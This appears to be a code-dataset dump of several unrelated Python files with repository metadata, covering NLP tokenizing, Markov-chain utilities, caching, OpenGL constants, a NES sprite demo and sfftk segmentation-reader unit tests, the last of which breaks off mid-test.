b6cac04d860710d1f200c5fdfd368545e66917d9 | 318 | py | Python | easytoken/blob.py | sayanmondal2098/tokenizer | 145f9ac5404583270fc90bfcc94c586d3b3931f2 | [
"MIT"
] | 3 | 2020-01-17T09:11:13.000Z | 2020-07-29T09:44:43.000Z | easytoken/blob.py | sayanmondal2098/tokenizer | 145f9ac5404583270fc90bfcc94c586d3b3931f2 | [
"MIT"
] | 1 | 2019-12-29T08:39:47.000Z | 2019-12-29T08:39:47.000Z | easytoken/blob.py | sayanmondal2098/tokenizer | 145f9ac5404583270fc90bfcc94c586d3b3931f2 | [
"MIT"
] | 4 | 2019-12-28T20:59:08.000Z | 2020-01-10T11:50:04.000Z | import sys
import json
import nltk
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize, sent_tokenize
class Partsofspeech():
def pos(txt):
tokens = nltk.word_tokenize(txt)
return (nltk.pos_tag(tokens))
# stop_words = set(stopwords.words('english')) | 19.875 | 55 | 0.710692 | 42 | 318 | 5.261905 | 0.52381 | 0.090498 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.204403 | 318 | 16 | 56 | 19.875 | 0.873518 | 0.138365 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.6 | 0 | 0.9 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
b6dc2d5c6b37c06411e4b2b686ddf633947cd5e9 | 409 | py | Python | db/folderName_to_CSV.py | JontyBurden/local-movies | f7df5156244d3b48ff5d5d906a84778a041e8e6a | [
"MIT"
] | null | null | null | db/folderName_to_CSV.py | JontyBurden/local-movies | f7df5156244d3b48ff5d5d906a84778a041e8e6a | [
"MIT"
] | null | null | null | db/folderName_to_CSV.py | JontyBurden/local-movies | f7df5156244d3b48ff5d5d906a84778a041e8e6a | [
"MIT"
] | null | null | null | import os, csv
path = 'F:\Movies-TV'
with open('C:\wsl\local-movies\db\movies.csv', 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
for root,dirs, files in os.walk(path):
for folders in dirs:
if folders == "Subs" or folders == "Subtitles" or folders == "Other" or folders == "subtitles":
pass
else:
writer.writerow([folders.replace('.', ' ')]) | 34.083333 | 105 | 0.586797 | 54 | 409 | 4.444444 | 0.62963 | 0.1125 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.244499 | 409 | 12 | 106 | 34.083333 | 0.776699 | 0 | 0 | 0 | 0 | 0 | 0.182927 | 0.080488 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.1 | 0.1 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
b6df00a62451dc167e6c6ea51fe423abf1e88505 | 400 | py | Python | Two pointers/26. Remove Duplicates from Sorted Array.py | ParisMineur/LeetCode-note | c780b66674b27a6a3ed35f522ab93202791e9da8 | [
"MIT"
] | null | null | null | Two pointers/26. Remove Duplicates from Sorted Array.py | ParisMineur/LeetCode-note | c780b66674b27a6a3ed35f522ab93202791e9da8 | [
"MIT"
] | null | null | null | Two pointers/26. Remove Duplicates from Sorted Array.py | ParisMineur/LeetCode-note | c780b66674b27a6a3ed35f522ab93202791e9da8 | [
"MIT"
] | null | null | null | class Solution:
def removeDuplicates(self, nums: List[int]) -> int:
l = len(nums)
if l == 1:
return 1
index = 1
num = nums[0]
for i in range(1, l):
if nums[i] == num:
continue
num = nums[i]
nums[index] = nums[i]
index += 1
return index
| 21.052632 | 55 | 0.3825 | 44 | 400 | 3.477273 | 0.477273 | 0.098039 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0.52 | 400 | 18 | 56 | 22.222222 | 0.765625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6e53ea6a72678a21b9d2e3336270225aa772e0f | 3,553 | py | Python | quantecon/markov/utilities.py | Smit-create/QuantEcon.py | 5be42da065c198e84a468d5e0e38056168a6b0e3 | [
"BSD-3-Clause"
] | 1,462 | 2015-01-08T18:58:13.000Z | 2022-03-29T05:24:28.000Z | quantecon/markov/utilities.py | Smit-create/QuantEcon.py | 5be42da065c198e84a468d5e0e38056168a6b0e3 | [
"BSD-3-Clause"
] | 505 | 2015-01-06T08:52:16.000Z | 2022-03-31T13:52:58.000Z | quantecon/markov/utilities.py | Smit-create/QuantEcon.py | 5be42da065c198e84a468d5e0e38056168a6b0e3 | [
"BSD-3-Clause"
] | 1,987 | 2015-01-08T06:08:39.000Z | 2022-03-29T08:02:45.000Z | """
Utility routines for the markov submodule
"""
import numpy as np
from numba import jit
@jit(nopython=True, cache=True)
def sa_indices(num_states, num_actions):
"""
Generate `s_indices` and `a_indices` for `DiscreteDP`, for the case
where all the actions are feasible at every state.
Parameters
----------
num_states : scalar(int)
Number of states.
num_actions : scalar(int)
Number of actions.
Returns
-------
s_indices : ndarray(int, ndim=1)
Array containing the state indices.
a_indices : ndarray(int, ndim=1)
Array containing the action indices.
Examples
--------
>>> s_indices, a_indices = qe.markov.sa_indices(4, 3)
>>> s_indices
array([0, 0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3])
>>> a_indices
array([0, 1, 2, 0, 1, 2, 0, 1, 2, 0, 1, 2])
"""
L = num_states * num_actions
dtype = np.int_
s_indices = np.empty(L, dtype=dtype)
a_indices = np.empty(L, dtype=dtype)
i = 0
for s in range(num_states):
for a in range(num_actions):
s_indices[i] = s
a_indices[i] = a
i += 1
return s_indices, a_indices
@jit(nopython=True, cache=True)
def _fill_dense_Q(s_indices, a_indices, Q_in, Q_out):
L = Q_in.shape[0]
for i in range(L):
Q_out[s_indices[i], a_indices[i], :] = Q_in[i, :]
return Q_out
@jit(nopython=True, cache=True)
def _s_wise_max_argmax(a_indices, a_indptr, vals, out_max, out_argmax):
n = len(out_max)
for i in range(n):
if a_indptr[i] != a_indptr[i+1]:
m = a_indptr[i]
for j in range(a_indptr[i]+1, a_indptr[i+1]):
if vals[j] > vals[m]:
m = j
out_max[i] = vals[m]
out_argmax[i] = a_indices[m]
@jit(nopython=True, cache=True)
def _s_wise_max(a_indices, a_indptr, vals, out_max):
n = len(out_max)
for i in range(n):
if a_indptr[i] != a_indptr[i+1]:
m = a_indptr[i]
for j in range(a_indptr[i]+1, a_indptr[i+1]):
if vals[j] > vals[m]:
m = j
out_max[i] = vals[m]
@jit(nopython=True, cache=True)
def _find_indices(a_indices, a_indptr, sigma, out):
n = len(sigma)
for i in range(n):
for j in range(a_indptr[i], a_indptr[i+1]):
if sigma[i] == a_indices[j]:
out[i] = j
@jit(nopython=True, cache=True)
def _has_sorted_sa_indices(s_indices, a_indices):
"""
Check whether `s_indices` and `a_indices` are sorted in
lexicographic order.
Parameters
----------
s_indices, a_indices : ndarray(ndim=1)
Returns
-------
bool
Whether `s_indices` and `a_indices` are sorted.
"""
L = len(s_indices)
for i in range(L-1):
if s_indices[i] > s_indices[i+1]:
return False
if s_indices[i] == s_indices[i+1]:
if a_indices[i] >= a_indices[i+1]:
return False
return True
@jit(nopython=True, cache=True)
def _generate_a_indptr(num_states, s_indices, out):
"""
Generate `a_indptr`; stored in `out`. `s_indices` is assumed to be
in sorted order.
Parameters
----------
num_states : scalar(int)
s_indices : ndarray(int, ndim=1)
out : ndarray(int, ndim=1)
Length must be num_states+1.
"""
idx = 0
out[0] = 0
for s in range(num_states-1):
while(s_indices[idx] == s):
idx += 1
out[s+1] = idx
out[num_states] = len(s_indices)
| 24.170068 | 71 | 0.565438 | 554 | 3,553 | 3.431408 | 0.169675 | 0.096791 | 0.0505 | 0.073645 | 0.517622 | 0.428196 | 0.332457 | 0.254603 | 0.153603 | 0.110468 | 0 | 0.020842 | 0.297777 | 3,553 | 146 | 72 | 24.335616 | 0.741082 | 0.30228 | 0 | 0.382353 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102941 | false | 0 | 0.029412 | 0 | 0.205882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6e579bdd514a20d1c5d2a97e578f7ccc82ca41c | 395 | py | Python | GmailWrapper_JE/venv/Lib/site-packages/cachetools/__init__.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | GmailWrapper_JE/venv/Lib/site-packages/cachetools/__init__.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | GmailWrapper_JE/venv/Lib/site-packages/cachetools/__init__.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | """Extensible memoizing collections and decorators."""
from .cache import Cache
from .decorators import cached, cachedmethod
from .lfu import LFUCache
from .lru import LRUCache
from .rr import RRCache
from .ttl import TTLCache
__all__ = (
'Cache',
'LFUCache',
'LRUCache',
'RRCache',
'TTLCache',
'cached',
'cachedmethod'
)
__version__ = '4.1.1'
| 18.809524 | 55 | 0.653165 | 42 | 395 | 5.952381 | 0.52381 | 0.144 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01 | 0.240506 | 395 | 20 | 56 | 19.75 | 0.823333 | 0.121519 | 0 | 0 | 0 | 0 | 0.183801 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
b6eaf6148ff2d5db7a379220d276e7ab7879f08c | 1,077 | py | Python | PyOpenGL-3.0.2/OpenGL/raw/GL/INGR/color_clamp.py | frederica07/Dragon_Programming_Process | c0dff2e20c1be6db5adc6f9977efae8f7f888ef5 | [
"BSD-2-Clause"
] | null | null | null | PyOpenGL-3.0.2/OpenGL/raw/GL/INGR/color_clamp.py | frederica07/Dragon_Programming_Process | c0dff2e20c1be6db5adc6f9977efae8f7f888ef5 | [
"BSD-2-Clause"
] | null | null | null | PyOpenGL-3.0.2/OpenGL/raw/GL/INGR/color_clamp.py | frederica07/Dragon_Programming_Process | c0dff2e20c1be6db5adc6f9977efae8f7f888ef5 | [
"BSD-2-Clause"
] | null | null | null | '''Autogenerated by get_gl_extensions script, do not edit!'''
from OpenGL import platform as _p
from OpenGL.GL import glget
EXTENSION_NAME = 'GL_INGR_color_clamp'
_p.unpack_constants( """GL_RED_MIN_CLAMP_INGR 0x8560
GL_GREEN_MIN_CLAMP_INGR 0x8561
GL_BLUE_MIN_CLAMP_INGR 0x8562
GL_ALPHA_MIN_CLAMP_INGR 0x8563
GL_RED_MAX_CLAMP_INGR 0x8564
GL_GREEN_MAX_CLAMP_INGR 0x8565
GL_BLUE_MAX_CLAMP_INGR 0x8566
GL_ALPHA_MAX_CLAMP_INGR 0x8567""", globals())
glget.addGLGetConstant( GL_RED_MIN_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_GREEN_MIN_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_BLUE_MIN_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_ALPHA_MIN_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_RED_MAX_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_GREEN_MAX_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_BLUE_MAX_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_ALPHA_MAX_CLAMP_INGR, (1,) )
def glInitColorClampINGR():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( EXTENSION_NAME )
| 39.888889 | 71 | 0.81987 | 161 | 1,077 | 5.024845 | 0.310559 | 0.177998 | 0.118665 | 0.12979 | 0.551298 | 0.346106 | 0.346106 | 0 | 0 | 0 | 0 | 0.049231 | 0.094708 | 1,077 | 26 | 72 | 41.423077 | 0.780513 | 0.108635 | 0 | 0 | 1 | 0 | 0.273973 | 0.187566 | 0 | 0 | 0.05058 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.136364 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6fee963092d66a5995b3a43e9089c5f670f7fd2 | 898 | py | Python | pynes/examples/mario.py | timgates42/pyNES | e385c7189eca44b9a9e0e781b28c8562e0647b0b | [
"BSD-3-Clause"
] | 1,046 | 2015-02-10T02:23:58.000Z | 2022-03-16T02:42:02.000Z | pynes/examples/mario.py | mcanthony/pyNES | 5f6078c02ae1fe9c6fecb4a8490f82f8c721cf3b | [
"BSD-3-Clause"
] | 30 | 2015-02-11T15:21:10.000Z | 2022-03-11T23:12:26.000Z | pynes/examples/mario.py | mcanthony/pyNES | 5f6078c02ae1fe9c6fecb4a8490f82f8c721cf3b | [
"BSD-3-Clause"
] | 132 | 2015-05-28T14:55:04.000Z | 2021-12-09T18:58:45.000Z | import pynes
from pynes.bitbag import *
if __name__ == "__main__":
pynes.press_start()
exit()
palette = [
0x22,0x29, 0x1A,0x0F, 0x22,0x36,0x17,0x0F, 0x22,0x30,0x21,0x0F, 0x22,0x27,0x17,0x0F,
0x22,0x16,0x27,0x18, 0x22,0x1A,0x30,0x27, 0x22,0x16,0x30,0x27, 0x22,0x0F,0x36,0x17]
chr_asset = import_chr('mario.chr')
tinymario = define_sprite(108,144, [50,51,52,53], 0)
mario = define_sprite(128, 128, [0, 1, 2, 3, 4, 5, 6, 7], 0)
firemario = define_sprite(164,128, [0, 1, 2, 3, 4, 5, 6, 7], 0)
def reset():
wait_vblank()
clearmem()
wait_vblank()
load_palette(palette)
load_sprite(tinymario, 0)
load_sprite(mario, 4)
load_sprite(firemario, 12)
def joypad1_up():
get_sprite(mario).y -= 1
def joypad1_down():
get_sprite(mario).y += 1
def joypad1_left():
get_sprite(mario).x -= 1
def joypad1_right():
get_sprite(mario).x += 1
| 20.883721 | 90 | 0.64922 | 144 | 898 | 3.854167 | 0.416667 | 0.099099 | 0.100901 | 0.021622 | 0.194595 | 0.136937 | 0.136937 | 0.043243 | 0.043243 | 0.043243 | 0 | 0.200549 | 0.18931 | 898 | 42 | 91 | 21.380952 | 0.561813 | 0 | 0 | 0.071429 | 0 | 0 | 0.018952 | 0 | 0 | 0 | 0.142698 | 0 | 0 | 1 | 0.178571 | false | 0 | 0.107143 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e057c3146b2a35d72243c16effee9d368779138 | 1,173 | py | Python | utils/paramutils.py | louity/generating-doodle | dfed08a5d278122e3303e84a22df5da2686255fe | [
"MIT"
] | null | null | null | utils/paramutils.py | louity/generating-doodle | dfed08a5d278122e3303e84a22df5da2686255fe | [
"MIT"
] | null | null | null | utils/paramutils.py | louity/generating-doodle | dfed08a5d278122e3303e84a22df5da2686255fe | [
"MIT"
] | null | null | null | import numpy as np
def point_to_seg(x1, x2) -> np.ndarray:
'''
Method:
-------
Transform 2 points into a parametrized segment. Implicitely phi is in
[-pi/2; pi/2], it is the oriented angle the segment makes with the
horizontal line passing through its middle c.
'''
c = (x1[:2] + x2[:2])/2
# TODO: funny could define different topologies to explore.
if np.sum((x2-x1)**2) == 0:
print('x2 is equal to x1?')
r = np.sqrt(np.sum((x2-x1)**2))
# TODO: chack that the angle is well oriented
sign = np.sign(x2[0] - x1[0]) * np.sign(x2[1] - x1[1])
phi = sign * np.arccos(np.abs(x2[0]-x1[0])/r)
if phi < - np.pi/2 or phi > np.pi/2:
raise ValueError('the value of phi is not in [-pi/2, pi/2] but it {}'.format(phi))
res = np.hstack([c, r, phi])
return res
def seg_to_point(seg) -> (np.ndarray, np.ndarray):
'''transforms seg (c,r,phi) into a tuple of two 2-d points'''
phi = seg[3]
r = seg[2]
c = seg[:2]
dx = np.abs(np.cos(phi)*r/2)
dy = np.abs(np.sin(phi)*r/2)
x1 = c - np.array([dx, np.sign(phi)*dy])
x2 = c + np.array([dx, np.sign(phi)*dy])
return(x1, x2)
| 32.583333 | 90 | 0.572038 | 215 | 1,173 | 3.102326 | 0.367442 | 0.026987 | 0.014993 | 0.02099 | 0.116942 | 0.062969 | 0.062969 | 0.062969 | 0 | 0 | 0 | 0.050905 | 0.246377 | 1,173 | 35 | 91 | 33.514286 | 0.70362 | 0.304348 | 0 | 0 | 0 | 0 | 0.087404 | 0 | 0 | 0 | 0 | 0.028571 | 0 | 1 | 0.095238 | false | 0 | 0.047619 | 0 | 0.190476 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e07779be64b5247716c3c8bb7b9dc225c5ec93a | 17,595 | py | Python | sfftk/unittests/test_readers.py | ssabrii/sfftk | 5cab37f1c9ecb9c2507672fd3232b1b9b5405511 | [
"Apache-2.0"
] | null | null | null | sfftk/unittests/test_readers.py | ssabrii/sfftk | 5cab37f1c9ecb9c2507672fd3232b1b9b5405511 | [
"Apache-2.0"
] | null | null | null | sfftk/unittests/test_readers.py | ssabrii/sfftk | 5cab37f1c9ecb9c2507672fd3232b1b9b5405511 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
sfftk.unittests.test_readers
This testing module should have no side-effects because it only reads.
"""
from __future__ import division, print_function
import glob
import os
import struct
import sys
import unittest
import numpy
import random_words
import __init__ as tests
import ahds
from ..readers import amreader, mapreader, modreader, segreader, stlreader, surfreader
__author__ = "Paul K. Korir, PhD"
__email__ = "pkorir@ebi.ac.uk, paul.korir@gmail.com"
__date__ = "2017-05-15"
__updated__ = '2018-02-14'
rw = random_words.RandomWords()
# readers
class TestReaders_amreader(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.am_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.am')
cls.header, cls.segments_by_stream = amreader.get_data(cls.am_file)
def test_get_data(self):
"""Test the main entry point: get_data(...)"""
self.assertIsInstance(self.header, ahds.header.AmiraHeader)
self.assertIsInstance(self.segments_by_stream, numpy.ndarray)
self.assertGreaterEqual(len(self.segments_by_stream), 1)
def test_first_line_amiramesh(self):
"""test that it's declared as an AmiraMesh file"""
self.assertEqual(self.header.designation.filetype, 'AmiraMesh')
def test_first_line_binary_little_endian(self):
"""test that it is formatted as BINARY-LITTLE-ENDIAN"""
self.assertEqual(self.header.designation.format, 'BINARY-LITTLE-ENDIAN')
def test_first_line_version(self):
"""test that it is version 2.1"""
self.assertEqual(self.header.designation.version, '2.1')
def test_lattice_present(self):
"""test Lattice definition exists in definitions"""
self.assertTrue('Lattice' in self.header.definitions.attrs)
def test_materials_present(self):
"""test Materials exist in parameters"""
self.assertIsNotNone('Materials' in self.header.parameters.attrs)
def test_read_hxsurface(self):
"""Test handling of AmiraMesh hxsurface files"""
am_hxsurface_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data_hxsurface.am')
header, segments_by_stream = amreader.get_data(am_hxsurface_file)
self.assertIsInstance(header, ahds.header.AmiraHeader)
self.assertIsNone(segments_by_stream)
class TestReaders_mapreader(unittest.TestCase):
def setUp(self):
self.map_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.map')
def test_get_data(self):
"""Test the main entry point: get_data(...)"""
map_ = mapreader.get_data(self.map_file)
self.assertIsInstance(map_, mapreader.Map)
self.assertGreater(map_._nc, 0)
self.assertGreater(map_._nr, 0)
self.assertGreater(map_._ns, 0)
self.assertIn(map_._mode, range(5))
self.assertIsInstance(map_._ncstart, int)
self.assertIsInstance(map_._nrstart, int)
self.assertIsInstance(map_._nsstart, int)
self.assertGreater(map_._nx, 0)
self.assertGreater(map_._ny, 0)
self.assertGreater(map_._nz, 0)
self.assertGreater(map_._x_length, 0)
self.assertGreater(map_._y_length, 0)
self.assertGreater(map_._z_length, 0)
self.assertTrue(0 < map_._alpha < 180)
self.assertTrue(0 < map_._beta < 180)
self.assertTrue(0 < map_._gamma < 180)
self.assertIn(map_._mapc, range(1, 4))
self.assertIn(map_._mapr, range(1, 4))
self.assertIn(map_._maps, range(1, 4))
self.assertIsInstance(map_._amin, float)
self.assertIsInstance(map_._amax, float)
self.assertIsInstance(map_._amean, float)
self.assertIn(map_._ispg, range(1, 231))
self.assertTrue(map_._nsymbt % 80 == 0)
self.assertIn(map_._lskflg, range(2))
self.assertIsInstance(map_._s11, float)
self.assertIsInstance(map_._s12, float)
self.assertIsInstance(map_._s13, float)
self.assertIsInstance(map_._s21, float)
self.assertIsInstance(map_._s22, float)
self.assertIsInstance(map_._s23, float)
self.assertIsInstance(map_._s31, float)
self.assertIsInstance(map_._s32, float)
self.assertIsInstance(map_._s33, float)
self.assertIsInstance(map_._t1, float)
self.assertIsInstance(map_._t2, float)
self.assertIsInstance(map_._t3, float)
self.assertEqual(map_._map, 'MAP ')
self.assertIsInstance(map_._machst, tuple)
self.assertGreater(map_._rms, 0)
self.assertGreater(map_._nlabl, 0)
def test_write(self):
"""Test write map file"""
map_to_write = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_write_map.map')
written_maps = glob.glob(map_to_write)
self.assertEqual(len(written_maps), 0)
with open(map_to_write, 'w') as f:
map_ = mapreader.get_data(self.map_file)
map_.write(f)
written_maps = glob.glob(map_to_write)
self.assertEqual(len(written_maps), 1)
map(os.remove, written_maps)
def test_invert(self):
"""Test invert map intensities"""
map_ = mapreader.get_data(self.map_file, inverted=False)
self.assertFalse(map_._inverted)
map_.invert()
self.assertTrue(map_._inverted)
map_ = mapreader.get_data(self.map_file, inverted=True)
self.assertTrue(map_._inverted)
# check the inversion is complete and that we add a new label
with open('rm.map', 'w') as f:
map_.write(f)
map__ = mapreader.get_data('rm.map')
self.assertEqual(map__._nlabl, 2)
os.remove('rm.map')
def test_fix_mask(self):
"""Test fix mask for fixable mask"""
fixable_mask = mapreader.Map(os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_fixable_mask.map'))
self.assertFalse(fixable_mask.is_mask)
fixable_mask.fix_mask()
self.assertTrue(fixable_mask.is_mask)
def test_unfixable_mask(self):
"""Test exception for unfixable mask"""
unfixable_mask = mapreader.Map(os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_unfixable_mask.map'))
self.assertFalse(unfixable_mask.is_mask)
with self.assertRaises(ValueError):
unfixable_mask.fix_mask()
self.assertFalse(unfixable_mask.is_mask)
def test_bad_data_fail(self):
"""Test that a corrupted file (extra data at end) raises Exception"""
with self.assertRaises(ValueError):
mapreader.Map(os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_bad_data1.map'))
def test_bad_data_fail2(self):
"""Test that we can raise an exception with a malformed header"""
with self.assertRaises(ValueError):
mapreader.get_data(os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data_corrupt_header.map'))
def test_bad_data_fail3(self):
"""Test that we can't have too long a header"""
with self.assertRaises(ValueError):
# create a map file with a header larger than 1024 to see the exception
map = mapreader.get_data(os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.map'))
for i in range(map._nlabl):
label = getattr(map, '_label_{}'.format(i))
y = 11
for j in range(1, y):
setattr(map, '_label_{}'.format(j), label)
map._nlabl = y
with open('rm.map', 'w') as f:
map.write(f)
class TestReaders_modreader(unittest.TestCase):
@classmethod
def setUp(cls):
cls.mod_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.mod')
cls.mod = modreader.get_data(cls.mod_file)
def test_get_data(self):
"""Test the main entry point: get_data(...)"""
self.assertTrue(self.mod.isset)
self.assertGreater(len(self.mod.objts), 0)
self.assertGreater(self.mod.objt_count, 0)
self.assertEqual(self.mod.version, 'V1.2')
self.assertEqual(self.mod.name, 'IMOD-NewModel')
self.assertGreater(self.mod.xmax, 0)
self.assertGreater(self.mod.ymax, 0)
self.assertGreater(self.mod.zmax, 0)
self.assertGreaterEqual(self.mod.objsize, 1)
self.assertIn(self.mod.drawmode, [-1, 1])
self.assertIn(self.mod.mousemode, range(3)) # unclear what 2 is equal to INVALID VALUE
self.assertIn(self.mod.blacklevel, range(256))
self.assertIn(self.mod.whitelevel, range(256))
self.assertEqual(self.mod.xoffset, 0)
self.assertEqual(self.mod.yoffset, 0)
self.assertEqual(self.mod.zoffset, 0)
self.assertGreater(self.mod.xscale, 0)
self.assertGreater(self.mod.yscale, 0)
self.assertGreater(self.mod.zscale, 0)
self.assertGreaterEqual(self.mod.object, 0)
self.assertGreaterEqual(self.mod.contour, -1)
self.assertGreaterEqual(self.mod.point, -1)
self.assertGreaterEqual(self.mod.res, 0)
self.assertIn(self.mod.thresh, range(256))
self.assertGreater(self.mod.pixsize, 0)
self.assertIn(self.mod.units, ['pm', 'Angstroms', 'nm', 'microns', 'mm', 'cm', 'm', 'pixels', 'km'])
self.assertIsInstance(self.mod.csum, int)
self.assertEqual(self.mod.alpha, 0)
self.assertEqual(self.mod.beta, 0)
self.assertEqual(self.mod.gamma, 0)
def test_read_fail1(self):
"""Test that file missing 'IMOD' at beginning fails"""
mod_fn = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_bad_data1.mod')
with self.assertRaises(ValueError):
modreader.get_data(mod_fn) # missing 'IMOD' start
def test_read_fail2(self):
"""Test that file missing 'IEOF' at end fails"""
mod_fn = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_bad_data2.mod')
with self.assertRaises(ValueError):
modreader.get_data(mod_fn) # missing 'IEOF' end
def test_IMOD_pass(self):
"""Test that IMOD chunk read"""
self.assertTrue(self.mod.isset)
def test_OBJT_pass(self):
"""Test that OBJT chunk read"""
for O in self.mod.objts.itervalues():
self.assertTrue(O.isset)
def test_CONT_pass(self):
"""Test that CONT chunk read"""
for O in self.mod.objts.itervalues():
for C in O.conts.itervalues():
self.assertTrue(C.isset)
def test_MESH_pass(self):
"""Test that MESH chunk read"""
for O in self.mod.objts.itervalues():
for M in O.meshes.itervalues():
self.assertTrue(M.isset)
def test_IMAT_pass(self):
"""Test that IMAT chunk read"""
for O in self.mod.objts.itervalues():
self.assertTrue(O.imat.isset)
def test_VIEW_pass(self):
"""Test that VIEW chunk read"""
for V in self.mod.views.itervalues():
self.assertTrue(V.isset)
def test_MINX_pass(self):
"""Test that MINX chunk read"""
self.assertTrue(self.mod.minx.isset)
def test_MEPA_pass(self):
"""Test that MEPA chunk read"""
for O in self.mod.objts.itervalues():
try:
self.assertTrue(O.mepa.isset)
except AttributeError:
self.assertEqual(O.mepa, None)
def test_CLIP_pass(self):
"""Test that CLIP chunk read"""
for O in self.mod.objts.itervalues():
try:
self.assertTrue(O.clip.isset)
except AttributeError:
self.assertEqual(O.clip, None)
def test_number_of_OBJT_chunks(self):
"""Test that compares declared and found OBJT chunks"""
self.assertEqual(self.mod.objsize, len(self.mod.objts))
def test_number_of_CONT_chunks(self):
"""Test that compares declared and found CONT chunks"""
for O in self.mod.objts.itervalues():
self.assertEqual(O.contsize, len(O.conts))
def test_number_of_MESH_chunks(self):
"""Test that compares declared and found MESH chunks"""
for O in self.mod.objts.itervalues():
self.assertEqual(O.meshsize, len(O.meshes))
def test_number_of_surface_objects(self):
"""Test that compares declared and found surface objects"""
for O in self.mod.objts.itervalues():
no_of_surfaces = 0
for C in O.conts.itervalues():
if C.surf != 0:
no_of_surfaces += 1
self.assertEqual(O.surfsize, no_of_surfaces)
def test_number_of_points_in_CONT_chunk(self):
"""Test that compares declared an found points in CONT chunks"""
for O in self.mod.objts.itervalues():
for C in O.conts.itervalues():
